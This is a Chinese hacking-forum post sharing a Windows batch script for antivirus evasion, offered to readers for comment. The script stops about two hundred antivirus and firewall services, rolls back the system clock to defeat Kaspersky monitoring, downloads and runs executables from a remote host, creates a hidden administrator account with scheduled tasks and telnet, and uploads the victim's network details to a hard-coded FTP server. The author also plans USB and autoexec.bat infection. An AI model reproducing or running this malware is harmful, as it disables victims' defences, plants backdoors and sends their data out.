前几天做免杀。累死了。。。不过终于做出来了。
试试
晕过不了主动
,,马上打电话问朋友。
他说改时间可以
过主动,发了一个
bat给我。。
看了看`````不错又上面加了一些东东。。
现在发来给大家批评批评
我还想加一个端口映射,这样内网运行了这个bat,以可以经松的telnet他。。。(linux下的ptables.
exe可以实现,但不会用,气死,正在学)
还会加一个U盘感染 (轻松)
还要加一个autoexec.bat感染 (轻松)
当然还会禁用或启用一些对我们有利的注册表 (轻松)
::========AV终结者DOS版======================
net stop ACKWIN32
net stop ADVXDWIN
net stop ALERTSVC
net stop ALOGSERV
net stop AMON9X
net stop ANTI-TROJAN
net stop ANTS
net stop apvxdwin
net stop ATCON
net stop ATUpdateR
net stop ATWATCH
net stop AUTODOWN
net stop AutoTrace
net stop AVCONSOL
net stop AVGCC32
net stop AVGCTRL
net stop Avgctrl
net stop AVGSERV
net stop AvgServ
net stop AVGSERV9
net stop AVGW
net stop avkpop
net stop AVKSERV
net stop avkservice
net stop avkwctl9
net stop AVP32
net stop AVP32
net stop AVPCC
net stop AVPCC
net stop AVPM
net stop AVPM
net stop Avsched32
net stop AVSYNMGR
net stop AvSynMgr
net stop AVWINNT
net stop AVXMONITOR9X
net stop AVXMONITORNT
net stop AVXQUAR
net stop AVXW
net stop BLACKD
net stop BLACKICE
net stop BlackICE
net stop CLAW95
net stop CLAW95CF
net stop CLEANER
net stop CLEANER3
net stop CMGRDIAN
net stop CONNECTIONMONITOR
net stop defscangui
net stop DEFWATCH
net stop DOORS
net stop DVP95
net stop EFPEADM
net stop ETRUSTCIPE
net stop EVPN
net stop EXPERT
net stop fameh32
net stop fch32
net stop fih32
net stop fnrb32
net stop fsaa
net stop fsav32
net stop fsgk32
net stop fsm32
net stop fsma32
net stop fsmb32
net stop gbmenu
net stop GENERICS
net stop GUARD
net stop GUARDDOG
net stop HELP
net stop IAMAPP
net stop IAMSERV
net stop ICLOAD95
net stop ICLOADNT
net stop ICMON
net stop ICSUPP95
net stop ICSUPPNT
net stop IFACE
net stop IOMON98
net stop ISRV95
net stop JEDI
net stop LDNETMON
net stop LDPROMENU
net stop LDSCAN
net stop LOCKDOWN
net stop LOCKDOWN2000
net stop LUALL
net stop LUCOMSERVER
net stop MCAGENT
net stop MCMNHDLR
net stop MCSHIELD
net stop McShield
net stop MCTOOL
net stop MCUpdate
net stop MCVSRTE
net stop MCVSSHLD
net stop MGAVRTCL
net stop MGAVRTE
net stop MGHTML
net stop minilog
net stop MONITOR
net stop MOOLIVE
net stop MWATCH
net stop NAVAP
net stop navapsvc
net stop NAVAPW32
net stop NAVENG
net stop NAVEX15
net stop NAVLU32
net stop NAVW32
net stop NAVWNT
net stop NDD32
net stop NeoWatchLog
net stop NETUTILS
net stop ngdbserv
net stop NGServer
net stop NISSERV
net stop NISSERV
net stop NISUM
net stop NISUM
net stop NMAIN
net stop NORMIST
net stop NPROTECT
net stop NPSSVC
net stop NSCHED32
net stop ntrtscan
net stop NTVDM
net stop NTXconfig
net stop NVC95
net stop NVSVC32
net stop NWService
net stop NWTOOL16
net stop PADMIN
net stop pavproxy
net stop PCCIOMON
net stop pccntmon
net stop pccwin97
net stop PCCWIN98
net stop pcscan
net stop PERSFW
net stop POP3TRAP
net stop POPROXY
net stop PORTMONITOR
net stop PROCESSMONITOR
net stop PROGRAMAUDITOR
net stop PROT95
net stop PVIEW95
net stop RAV7
net stop RAV7WIN
net stop REALMON
net stop RESCUE
net stop RTVSCN95
net stop sbserv
net stop SCAN32
net stop SCRSCAN
net stop sharedaccess
net stop SPHINX
net stop SPYXX
net stop SS3EDIT
net stop STOPW
net stop SVW3
net stop SWEEP95
net stop SweepNet
net stop SWEEPSRV
net stop SWEEPSRV.SYS
net stop SweepUpdate
net stop SWNETSUP
net stop SymProxySvc
net stop SYMTRAY
net stop TFAK
net stop vbcmserv
net stop VbCons
net stop VET32
net stop VET95
net stop VETTRAY
net stop VPC32
net stop VPTRAY
net stop VSCHED
net stop VSECOMR
net stop VSHWIN32
net stop VSMAIN
net stop vsmon
net stop VSMON
net stop VSSTAT
net stop WATCHDOG
net stop WEBSCANX
net stop WGFE95
net stop WIMMUN32
net stop WRADMIN
net stop WRCTRL
net stop ZAPROMINILOG
net stop ZONEALARM
::======修改
系统时间使
卡巴监控失效============
set date=%date%
date 1990-01-01
date 1990-01-01
C:\360sofa.exe
del C:\1.
vbs::========wget递归
下载者======================
wget http://baidu.com/1.exe
wget http://baidu.com/2.txt
wget http://baidu.com/3.bat
wget -r 2.txt
start 1.exe
start 2.exe
start 3.bat
::========留下
后门======================
@echo off
@attrib +r +s system.bat
@net user Guests 254731878 /add
@net localgroup administrators Guests /add
@sc config Schedule start= auto
@net stop "Task Scheduler"
@net start "Task Scheduler"
@echo at 10:00 %systemroot%\SYSTEM32\svchost.bat > %systemroot%\SYSTEM32\system.bat
@echo at 20:00 %systemroot%\SYSTEM32\svchost.bat >> %systemroot%\SYSTEM32\system.bat
@at 10:03 %systemroot%\SYSTEM32\system.bat
@at 20:03 %systemroot%\SYSTEM32\system.bat
@sc config NtlmSsp start= auto
@net start NtlmSsp
@sc config RpcSs start= auto
@net start RpcSs
@sc config tlntsvr start= auto
@net stop telnet
@net start telnet
@exit
::========发送自己IP信息到FTP上======================
ftp
open 221.195.42.71
lung005
254731878
!
wget http://www.ip138.com/ip2city.asp
ipconfig /all >>ip2city.asp
for /f "tokens=12" %%i in ('ipconfig /all ^| find /i "Physical"') do (
cls
ren ip2city.asp & %%i
)
exit
put c:\
windows\system32\%%i------------------(这好像不对,正在改正。希望那位大哥可以帮我)
bye
::========倒计时等待15秒======================
@echo off & setlocal enableextensions
echo WScript.Sleep 1000 > %temp%.\tmp$$$.vbs
set /a i = 15
:Timeout
if %i% == 0 goto Next
setlocal
set /a i = %i% - 1
cscript //nologo %temp%.\tmp$$$.vbs
goto Timeout
goto End
::======恢复时间(卡巴监控)=======================
date 2007-05-14 让系统时间设为你所指定的时间
date %date% 让系统时间与Internet同步
del C:\1.bat
> >
